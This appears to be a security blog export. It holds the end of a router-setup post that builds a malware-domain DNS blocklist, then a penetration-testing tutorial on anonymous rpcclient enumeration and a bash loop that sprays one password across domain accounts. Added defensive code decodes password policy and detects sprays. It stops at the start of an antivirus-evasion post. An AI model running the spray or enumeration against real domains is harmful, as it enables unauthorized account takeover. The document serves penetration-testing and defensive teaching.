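<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The dhcpd.conf just described, generated by a small shell script so that the 30-day lease arithmetic and the .50 start of each range are explicit, followed by a syntax check using dhcpd's own -t option. This is an added example rather than the post's file: the three subnets, the .1 router addresses, and using the router as the DNS server on each segment are assumptions, since the post does not list its subnets in this section.</span></div>

```shell
#!/bin/sh
# Added example, not the post's own dhcpd.conf. Writes an ISC dhcpd
# configuration for the three internal segments described in the post:
# a dynamic range starting at .50 on each segment and a 30-day lease
# (30 * 86400 = 2592000 seconds). The subnets, the .1 router addresses and
# the DNS server (the router itself) are assumptions.

LEASE_SECONDS=$((30 * 86400))

# dhcp_subnet <prefix such as 192.168.1> : emits one /24 subnet stanza.
dhcp_subnet() {
    p=$1
    cat <<EOF
subnet $p.0 netmask 255.255.255.0 {
    range $p.50 $p.250;
    option routers $p.1;
    option domain-name-servers $p.1;
    option broadcast-address $p.255;
}
EOF
}

# gen_dhcpd_conf : the complete file, one stanza per internal segment.
gen_dhcpd_conf() {
    cat <<EOF
# Generated for the SOHO router example; serves eth1, eth2 and eth3.
authoritative;
default-lease-time $LEASE_SECONDS;
max-lease-time $LEASE_SECONDS;
ddns-update-style none;

EOF
    for p in 192.168.1 192.168.2 192.168.3; do
        dhcp_subnet "$p"
        echo
    done
}

# check_dhcpd_conf <file> : syntax-check with dhcpd itself when it is installed.
check_dhcpd_conf() {
    if command -v dhcpd >/dev/null 2>&1; then
        dhcpd -t -cf "$1"
    else
        echo "dhcpd not installed; skipping syntax check of $1" >&2
    fi
}

# Usage: gen_dhcpd_conf > /etc/dhcp/dhcpd.conf && check_dhcpd_conf /etc/dhcp/dhcpd.conf
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On Ubuntu the server also has to be told which interfaces to listen on, through INTERFACES (INTERFACESv4 on newer releases) in /etc/default/isc-dhcp-server; those are the eth1, eth2 and eth3 from the post, and deliberately not the Internet-facing interface.</span></div>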
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With regard to bind9 (DNS services), the default Ubuntu installation yields a caching name server which resolves via the Internet root name servers, and is sufficient for most purposes. An extension some people may want to consider is forwarding queries to a DNS filtering service (such as OpenDNS), and/or running some specific filtering of your own. In my case, I leverage the “dshield” bad domain lists, which are maintained by Johannes Ullrich of the SANS Institute. An example of how to configure bind9 to forward all queries to an upstream DNS server is listed below.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The configuration screenshot below is a modification to the “/etc/bind/named.conf.options” file to forward all queries to the upstream Google DNS server at 8.8.8.8, and to restrict which networks are able to perform recursive DNS queries. Forwarding to an upstream server is completely optional, and if you choose to do so, a trusted DNS filtering service is advisable. Restricting which clients can make recursive queries should be considered an essential part of the configuration.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="318" src="https://lh3.googleusercontent.com/hv6TgZmRYbENslTOmuHzPGMnk0KzzHR_SQPAgadyKJASUGNr7lbarPKq9a4RTMC2hs1rJD41NlmdLa6AU9Gw2Kdl1buvU8uvYRJE_UNrSFTdmKGGfkw-CwmlsMD9iEi5qOTcYVms" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="342" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/bind/named.conf.options</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As regards the “dshield” bad domains list, I have created a shell script called “get_malware_domains.sh” whose job it is to fetch the URL “</span><a href="https://isc.sans.edu/feeds/suspiciousdomains_Low.txt" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://isc.sans.edu/feeds/suspiciousdomains_Low.txt</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">” and then convert that list into bind9 configuration file format. An example of the configuration file format is as follows.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="140" src="https://lh3.googleusercontent.com/pi10v96Ts6r9Wb_EE8346G7REOISl5ODseUbBgB0ThmdrNdaz83bpHm28MEePnevF039Lyos8U1D8AuDtO82x6qf6Lyq3fY1StBzgnhGbaSd1gWoFJIylGTL8GYOLEOdTL-X4Edf" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="511" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">named.conf.dshield file</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The concept is that any domain listed in this file will be resolved to the address “127.0.0.1”.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="148" src="https://lh6.googleusercontent.com/Ce2dYlkaiyk9P3ZjAxN1DnxP_rIeBkonQWYJhyDi--a0YC8ftrLqmCUHrtg3D0d2l4uzQnDx-qu9YSz8kFP0Rbm7twJkMrBSN8KuoJ8sS0mbSrx9j8-tX0pDk_LG13Q8DqrTFdWP" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="433" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The “db.blackhole” file contents.</span></div>
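<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The two bind9 pieces above, the named.conf.options change and the conversion of the dshield list into blackhole zones served from db.blackhole, as one added shell script. It is neither the post's get_malware_domains.sh nor its configuration files: the fetch of the feed is left out so the script runs offline against a constructed sample list, the upstream resolver and the internal subnets are assumptions, and the per-zone stanza (type master, every zone pointed at db.blackhole) is the conventional layout rather than a copy of the screenshot. The db.blackhole contents use a wildcard record so that subdomains of a listed name also resolve to 127.0.0.1.</span></div>

```shell
#!/bin/sh
# Added example, not the post's get_malware_domains.sh or its bind9 files.
# Assumptions: the upstream resolver and internal subnets below, and the
# per-zone stanza layout (type master, every zone served from db.blackhole).
UPSTREAM=${UPSTREAM:-8.8.8.8}
INTERNAL_NETS=${INTERNAL_NETS:-"192.168.1.0/24; 192.168.2.0/24; 192.168.3.0/24;"}
BLACKHOLE_DB=${BLACKHOLE_DB:-/etc/bind/db.blackhole}

# named_options : contents for /etc/bind/named.conf.options. The forwarders
# line is optional; allow-recursion is the line that must not be left open,
# or the router answers recursive queries for anyone who can reach it.
named_options() {
    cat <<EOF
options {
    directory "/var/cache/bind";
    forwarders { $UPSTREAM; };
    allow-recursion { 127.0.0.1; $INTERNAL_NETS };
    dnssec-validation auto;
};
EOF
}

# list_to_zones : stdin = suspicious-domain list (comments start with "#",
# one name per line), stdout = one bind9 zone stanza per unique name.
# Names are lower-cased, a trailing dot is removed, and anything that does
# not look like a host name is dropped rather than written into named.conf.
list_to_zones() {
    tr '[:upper:]' '[:lower:]' \
    | sed -e 's/#.*//' -e 's/[[:space:]]//g' -e 's/\.$//' \
    | grep -E '^[a-z0-9._-]+\.[a-z]{2,}$' \
    | sort -u \
    | while read -r d; do
        printf 'zone "%s" { type master; file "%s"; };\n' "$d" "$BLACKHOLE_DB"
    done
}

# blackhole_db : the zone file every listed name is served from. The wildcard
# makes subdomains of a listed name resolve to 127.0.0.1 as well.
blackhole_db() {
    cat <<'EOF'
$TTL 86400
@       IN SOA  localhost. root.localhost. ( 1 3600 900 604800 86400 )
        IN NS   localhost.
        IN A    127.0.0.1
*       IN A    127.0.0.1
EOF
}

# check_bind <conf> <zonefile> : run bind9's own checkers when installed.
check_bind() {
    if command -v named-checkconf >/dev/null 2>&1; then
        named-checkconf "$1" && named-checkzone blackhole.test "$2"
    else
        echo "bind9 utilities not installed; skipping checks" >&2
    fi
}

# Constructed sample in the shape of the feed; not real feed content.
SAMPLE_LIST='#
#  constructed sample; comment lines are dropped
#
bad-example.test
Malware.Example.NET
bad-example.test
tracker.example.org.
not a domain line'

# Usage, writing to a scratch directory first so nothing touches /etc/bind:
#   named_options > /tmp/named.conf.options
#   printf '%s\n' "$SAMPLE_LIST" | list_to_zones > /tmp/named.conf.dshield
#   blackhole_db > /tmp/db.blackhole
#   check_bind /tmp/named.conf.dshield /tmp/db.blackhole
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The filter in list_to_zones matters because the generated file is included into the running named configuration: a stray header or malformed line in the feed would otherwise stop bind9 from reloading, which is why running named-checkconf before a reload is worth the extra step.</span></div>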
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">All of the above descriptive text will also be supported by a small tar file containing some of the key file contents described here. Happy hunting!</span></div>
</b><br class="Apple-interchange-newline" /> </b>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-2320276621879394553.post-73037981360992125632015-10-29T17:59:00.000-07:002015-10-30T06:30:57.718-07:00Password spraying and other fun with rpcclient<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Many of us in the penetration testing community are used to scenarios whereby we land a targeted phishing campaign within a Windows enterprise environment and have that wonderful access into the world of Windows command line networking tools. You get your shell and before you know it, you are ready to run all your favorite enumeration commands. These are things like:</span><br />
<ul>
<li>C:\> NET VIEW /DOMAIN</li>
<li>C:\> NET GROUP "Domain Administrators" /DOMAIN</li>
</ul>
<span style="font-family: Arial,Helvetica,sans-serif;">and so on. Not to mention that you often have all of the wealth of Metasploit post exploitation modules, and the many wonders of various PowerShell tools such as Veil, and PowerShell Empire.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Imagine a world where all you have is a Linux host available on an internal network with no backdoor shell access to any existing Windows system. Imagine that world wherein you are effectively segmented away from the rest of the network and cannot even capture useful network traffic using interception techniques such as Ettercap. This was indeed the case for me recently whereby all I could do was SSH into a single Linux host I controlled.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">After not having been in this situation for some time, I paused a moment before recalling the wonderful world of Samba. In particular, there are two excellent and useful programs in the Samba suite, namely "<b>rpcclient</b>" and its friend "<b>smbclient</b>". Also, let us not forget our favorite DNS utility called "<b>dig</b>".</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">My first task was to use available reconnaissance to make informed guesses as to what the internal domain name was likely to be. There are a few different methods to think about here but the first thing was to play with "dig" to determine DNS information of use. I can try to look up the Windows global catalog record, and authoritative domain server records to determine domain controller addresses. Examples as follows:</span><br />
<br />
<b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"># dig @10.10.10.10 -t NS domain.corp</span></span></b><br />
<b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"># dig @10.10.10.10 _gc.domain.corp</span></span></b><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">This will only give me answers if I have predicted or determined the correct "domain.corp" name.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Now, luckily for me, I had access to internal Nessus vulnerability report data and had determined that SMB NULL sessions were permitted to some hosts. I matched up the data to my dig results and determined that the NULL sessions actually corresponded to domain controller addresses. My next task was to try and enumerate user and group information from the domain controllers with only "rpcclient" available to me. I quickly determined from the "man" page that rpcclient could indeed perform an anonymous bind as follows:</span><br />
<br />
<b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"># rpcclient -U "" -N 10.10.10.10</span></span></b><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">whereby 10.10.10.10 was the chosen address of the domain controller I could anonymously bind to. After that command was run, "rpcclient" will give you the most excellent "rpcclient> " prompt. At this point in time, if you can use anonymous sessions, then there are some very useful commands within the tool.</span><br />
<ol>
<li><span style="font-family: Arial,Helvetica,sans-serif;">Enumerate Domain Users</span><br /><br /><span style="font-family: "Courier New",Courier,monospace;"><b><span style="color: #38761d;">rpcclient $> enumdomusers<br />user:[Administrator] rid:[0x1f4]<br />user:[Guest] rid:[0x1f5]<br />user:[krbtgt] rid:[0x1f6]<br />user:[jdoe] rid:[0x44f]<br /></span></b></span></li>
<li><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;">Enumerate Domain Groups<br /><br /><span style="font-family: "Courier New",Courier,monospace;"><span style="color: #38761d;"><b>rpcclient $> enumdomgroups<br />group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]<br />group:[Domain Admins] rid:[0x200]<br />group:[Domain Users] rid:[0x201]<br />group:[Domain Guests] rid:[0x202]<br />group:[Domain Computers] rid:[0x203]<br />group:[Domain Controllers] rid:[0x204]<br /></b></span></span></span></span></li>
<li><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;">Query Group Information and Group Membership<br /> </span></span><br /><b><span style="color: #38761d;">rpcclient $> querygroup 0x204<br /> Group Name: Domain Controllers<br /> Description: All domain controllers in the domain<br /> Group Attribute:7<br /> Num Members:1<br /><br />rpcclient $> querygroupmem 0x204<br /> rid:[0x3e8] attr:[0x7]<br /></span></b></span></span></span></li>
<ol>
<li><span style="font-family: Arial,Helvetica,sans-serif;">Query Specific User Information (including computers) by RID.</span><br /><br /><b><span style="font-size: x-small;"><span style="color: #38761d;"><span style="font-family: 'Courier New',Courier,monospace;">rpcclient $> queryuser 0x3e8<br /> User Name : WIN-LV721N9S64M$<br /> Full Name : <br /> Home Drive : <br /> Dir Drive : <br /> Profile Path: <br /> Logon Script: <br /> Description : <br /> Workstations: <br /> Comment : <br /> Remote Dial :<br /> Logon Time : Thu, 29 Oct 2015 19:21:28 EDT<br /> Logoff Time : Wed, 31 Dec 1969 19:00:00 EST<br /> Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT<br /> Password last set Time : Mon, 12 Oct 2015 00:12:11 EDT<br /> Password can change Time : Tue, 13 Oct 2015 00:12:11 EDT<br /> Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT<br /> unknown_2[0..31]...<br /> user_rid : 0x3e8<br /> group_rid: 0x204<br /> acb_info : 0x00002100<br /> fields_present: 0x00ffffff<br /> logon_divs: 168<br /> bad_password_count: 0x00000000<br /> logon_count: 0x00000834<br /> padding1[0..7]...<br /> logon_hrs[0..21]...</span></span></span></b><br /><br /><br />
<span style="font-family: Arial,Helvetica,sans-serif;">So in working with these basic commands, I was able to survey the landscape of Windows domain user and group information pretty thoroughly.<br /><br />Another technique often used during a penetration test is called "Password Spraying". Given a list of domain users and knowledge of commonly used passwords, the tester attempts a login for every user in the list. The technique is very effective provided that you deliberately limit the list of passwords you try to a small number. In fact, a single password per spraying attempt is advisable, for the sole reason that you really do not want to lock accounts.<br /><br />Before password spraying, it is very useful to determine the Windows domain password policy, using a command such as "NET ACCOUNTS /DOMAIN" in the Windows world. However, given that we don't have a Windows shell available to us, rpcclient gives us the following options.<br /><br /></span><b><span style="color: #38761d;"><span style="font-family: 'Courier New',Courier,monospace;">rpcclient $> getdompwinfo<br />min_password_length: 11<br />password_properties: 0x00000000<br /><br />rpcclient $> getusrdompwinfo 0x44f<br />min_password_length: 11<br /> &info.password_properties: 0x4b58bb34 (1264106292)<br /> 0: DOMAIN_PASSWORD_COMPLEX <br /> 0: DOMAIN_PASSWORD_NO_ANON_CHANGE<br /> 1: DOMAIN_PASSWORD_NO_CLEAR_CHANGE<br /> 0: DOMAIN_PASSWORD_LOCKOUT_ADMINS<br /> 1: DOMAIN_PASSWORD_STORE_CLEARTEXT<br /> 1: DOMAIN_REFUSE_PASSWORD_CHANGE</span></span></b><br /><br />
<span style="font-family: Arial,Helvetica,sans-serif;">At least we are able to determine the crucial information about the password length. After I write this, I will probably work out how to decode the password properties and match them back to the appropriate information, but I have not yet done that task.<br /><br />In order to perform a password spray attack, the next step is to pick a common password (such as "Autumn2015") and work out our technique for spraying using "rpcclient". Conveniently, "rpcclient" allows us to specify commands on the command line, which is very handy. The following two examples show a successful logon versus a failed logon (the password "bbb" is the correct one).<br /><br /></span><b><span style="color: #38761d;"><span style="font-family: 'Courier New',Courier,monospace;"># rpcclient -U "jdoe%bbb" -c "getusername;quit" 10.10.10.10<br />Account Name: jdoe, Authority Name: DOMAIN<br /><br /># rpcclient -U "jdoe%aaa" -c "getusername;quit" 10.10.10.10<br />Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE</span></span></b><br /><br />
<span style="font-family: Arial,Helvetica,sans-serif;">In these examples, we specifically told "rpcclient" to run two commands, these being "getusername" and then "quit" to exit the client. Now we have all of the ingredients to perform a password spraying attack. All we need is a Bourne/bash shell loop and we are off to the races. An example of a simple shell script or command line to spray, given that the "enumdomusers" output is in the "domain-users.txt" file, is as follows.<br /><br /></span><b><span style="color: #38761d;"><span style="font-family: 'Courier New',Courier,monospace;"># for u in `cat domain-users.txt`; do \<br /> echo -n "[*] user: $u" && \<br /> rpcclient -U "$u%Autumn2015" \<br /> -c "getusername;quit" 10.10.10.10; \<br />done</span></span></b><br /><br />
<span style="font-family: Arial,Helvetica,sans-serif;">You know that you are successful when you see the string "Authority" appear in the output. Lack of success for each user is going to be the "NT_STATUS_LOGON_FAILURE" message.<br /><br />If you begin to get the "ACCOUNT_LOCKED" failure you should immediately stop your spray, because you have likely sprayed too many times in a short period of time.<br /><br />Assuming you have gained access to a credential, one of the additional nice things you can do is explore the SYSVOL using the "smbclient" program. The syntax is as follows.<br /><br /></span><span style="font-size: x-small;"><b><span style="color: #38761d;"><span style="font-family: 'Courier New',Courier,monospace;">$ smbclient -U "jdoe%bbb" \\\\domain.corp\\SYSVOL<br />Domain=[HOME] OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]<br />smb: \> ls<br /> . D 0 Fri Dec 12 09:46:28 2014<br /> .. D 0 Fri Dec 12 09:46:28 2014<br /> domain.corp D 0 Fri Dec 12 09:46:28 2014<br /><br /> 61337 blocks of size 1048576. 38567 blocks available</span></span></b></span><br /><br />
<span style="font-family: Arial,Helvetica,sans-serif;">I highly recommend getting familiar with the UNIX Samba suite and in particular these tools. They quite literally saved my bacon over the past week, and you could well be in the same boat needing these fun tools in your future also.</span><br /></li>
</ol>
</ol>
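The post leaves decoding the password_properties bitmask as a to-do. As an added example (not from the post and not Samba's own code), the Python below parses the getdompwinfo and getusrdompwinfo output quoted above, decodes the value against the DOMAIN_PASSWORD_* bits defined in MS-SAMR, and reports the findings a password-policy audit would want; the 12-character baseline and the finding codes are my own assumptions.

```python
import re

# DOMAIN_PASSWORD_* bits of the PasswordProperties field (MS-SAMR,
# DOMAIN_PASSWORD_INFORMATION). rpcclient lists them in this order.
PASSWORD_PROPERTY_FLAGS = {
    0x00000001: "DOMAIN_PASSWORD_COMPLEX",
    0x00000002: "DOMAIN_PASSWORD_NO_ANON_CHANGE",
    0x00000004: "DOMAIN_PASSWORD_NO_CLEAR_CHANGE",
    0x00000008: "DOMAIN_PASSWORD_LOCKOUT_ADMINS",
    0x00000010: "DOMAIN_PASSWORD_STORE_CLEARTEXT",
    0x00000020: "DOMAIN_REFUSE_PASSWORD_CHANGE",
}
KNOWN_MASK = sum(PASSWORD_PROPERTY_FLAGS)  # 0x3f, the documented bits

# rpcclient output quoted from the post (getdompwinfo, then getusrdompwinfo 0x44f).
GETDOMPWINFO_OUTPUT = """\
min_password_length: 11
password_properties: 0x00000000
"""
GETUSRDOMPWINFO_OUTPUT = """\
min_password_length: 11
 &info.password_properties: 0x4b58bb34 (1264106292)
"""


def decode_password_properties(value):
    """Names of the documented flags set in a password_properties value, low bit first."""
    return [name for bit, name in sorted(PASSWORD_PROPERTY_FLAGS.items()) if value & bit]


def parse_password_info(text):
    """Pull min_password_length and password_properties out of rpcclient output.
    The regex tolerates the '&info.' prefix that getusrdompwinfo prints."""
    min_len = re.search(r"min_password_length:\s*(\d+)", text)
    props = re.search(r"password_properties:\s*(0x[0-9a-fA-F]+)", text)
    if not (min_len and props):
        raise ValueError("rpcclient output lacks password policy fields")
    return {
        "min_password_length": int(min_len.group(1)),
        "password_properties": int(props.group(1), 16),
    }


def audit_policy(policy, min_recommended_length=12):
    """Return (flags, findings); each finding is a (code, message) pair.
    The recommended length is an assumed baseline, not something the post states."""
    value = policy["password_properties"]
    flags = decode_password_properties(value)
    findings = []
    if "DOMAIN_PASSWORD_COMPLEX" not in flags:
        findings.append(("NO_COMPLEXITY", "complexity requirement is not enforced"))
    if policy["min_password_length"] < min_recommended_length:
        findings.append(("SHORT_MIN_LENGTH", "minimum length %d is below %d"
                         % (policy["min_password_length"], min_recommended_length)))
    if "DOMAIN_PASSWORD_STORE_CLEARTEXT" in flags:
        findings.append(("CLEARTEXT_STORAGE", "passwords stored with reversible encryption"))
    undocumented = value & ~KNOWN_MASK
    if undocumented:
        # Only the low six bits are documented; anything else means the value
        # should not be trusted without a second look.
        findings.append(("UNDOCUMENTED_BITS", "bits 0x%08x are outside the documented flag set"
                         % undocumented))
    return flags, findings


if __name__ == "__main__":
    for label, text in (("domain", GETDOMPWINFO_OUTPUT), ("user 0x44f", GETUSRDOMPWINFO_OUTPUT)):
        flags, findings = audit_policy(parse_password_info(text))
        print(label, flags, [code for code, _ in findings])
```

Decoding the post's 0x4b58bb34 reproduces exactly the three flags rpcclient marked with a 1, which confirms the bit mapping; the domain-level value of 0 means no complexity requirement at all.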
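From the defender's side, the spray loop above leaves a distinctive shape in a domain controller's failed-logon records: one failure per account, across many accounts, from one source, inside a short window, which is the opposite of a brute force that hammers a single account. As an added example that is not part of the original post, the Python below applies that heuristic to constructed records in a simplified "timestamp source account status" format (the NT_STATUS strings follow the ones rpcclient prints); the thresholds are assumptions to be tuned to the domain's lockout policy.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed thresholds; tune them to the domain's lockout threshold and observation window.
SPRAY_MIN_USERS = 5       # distinct accounts hit from one source inside WINDOW
SPRAY_MAX_PER_USER = 2    # a spray goes wide, not deep: few failures per account
BRUTE_MIN_PER_USER = 5    # this many failures on one account is a brute force
WINDOW = timedelta(minutes=10)

# Constructed sample records, not real logs: "<timestamp> <source> <account> <NT status>".
# 10.10.10.20 sprays one password across six accounts (one succeeds, one ends up
# locked out), 10.10.10.30 hammers a single account, 10.10.10.40 is background noise.
SAMPLE_RECORDS = """\
2015-10-29T09:00:01 10.10.10.20 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:00:02 10.10.10.20 asmith NT_STATUS_LOGON_FAILURE
2015-10-29T09:00:03 10.10.10.20 bjones NT_STATUS_LOGON_FAILURE
2015-10-29T09:00:04 10.10.10.20 clee   NT_STATUS_OK
2015-10-29T09:00:05 10.10.10.20 dkim   NT_STATUS_LOGON_FAILURE
2015-10-29T09:00:06 10.10.10.20 eroy   NT_STATUS_LOGON_FAILURE
2015-10-29T09:00:07 10.10.10.20 asmith NT_STATUS_ACCOUNT_LOCKED_OUT
2015-10-29T09:05:00 10.10.10.30 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:05:10 10.10.10.30 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:05:20 10.10.10.30 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:05:30 10.10.10.30 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:05:40 10.10.10.30 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:05:50 10.10.10.30 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:06:00 10.10.10.30 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:20:00 10.10.10.40 jdoe   NT_STATUS_LOGON_FAILURE
2015-10-29T09:20:30 10.10.10.40 bjones NT_STATUS_LOGON_FAILURE
""".splitlines()


def parse_record(line):
    """Split one record into (datetime, source, account, status)."""
    ts, src, user, status = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), src, user, status


def classify_source(events):
    """events: time-sorted (datetime, account) failures from one source.
    Returns 'spray', 'brute_force' or None from the first window that trips a rule."""
    for i, (start, _) in enumerate(events):
        per_user = Counter(u for t, u in events[i:] if t - start <= WINDOW)
        if len(per_user) >= SPRAY_MIN_USERS and max(per_user.values()) <= SPRAY_MAX_PER_USER:
            return "spray"
        if max(per_user.values()) >= BRUTE_MIN_PER_USER:
            return "brute_force"
    return None


def analyse_records(lines):
    """Return (alerts keyed by source, sorted list of accounts that hit lockout)."""
    failures = defaultdict(list)
    successes = defaultdict(set)
    locked_out = set()
    for line in lines:
        if not line.strip():
            continue
        ts, src, user, status = parse_record(line)
        if status == "NT_STATUS_OK":
            successes[src].add(user)
        else:
            failures[src].append((ts, user))
            if status == "NT_STATUS_ACCOUNT_LOCKED_OUT":
                locked_out.add(user)
    alerts = {}
    for src, events in failures.items():
        kind = classify_source(sorted(events))
        if kind:
            alerts[src] = {
                "kind": kind,
                "accounts_hit": sorted({u for _, u in events}),
                # An account that authenticated from a spraying host is a likely
                # compromised credential: reset it first, then block the source.
                "successful_logons": sorted(successes.get(src, ())),
            }
    return alerts, sorted(locked_out)


if __name__ == "__main__":
    alerts, locked = analyse_records(SAMPLE_RECORDS)
    for src, alert in alerts.items():
        print(src, alert)
    print("locked out:", locked)
```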
<br />Modifying Metasploit x64 template for AV evasion (published 2015-10-29)<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
When performing a penetration test of organizations with Windows desktops, many testers will now resort to using tools like Veil’s Powershell Empire in order to inject shellcode directly into memory. Without doubt, this is a fantastic technique, as it avoids writing to disk and running headlong into a direct hit by most endpoint protection solutions.</div>
<div id="innerContainer_diky1gjp" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="185.95161290322582" data-react-checksum="1460677593" data-reactid=".e" id="innercomp_diky1gjp" style="background: transparent; border: 0px; clear: both; display: block; height: 186px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 453px;" title="">
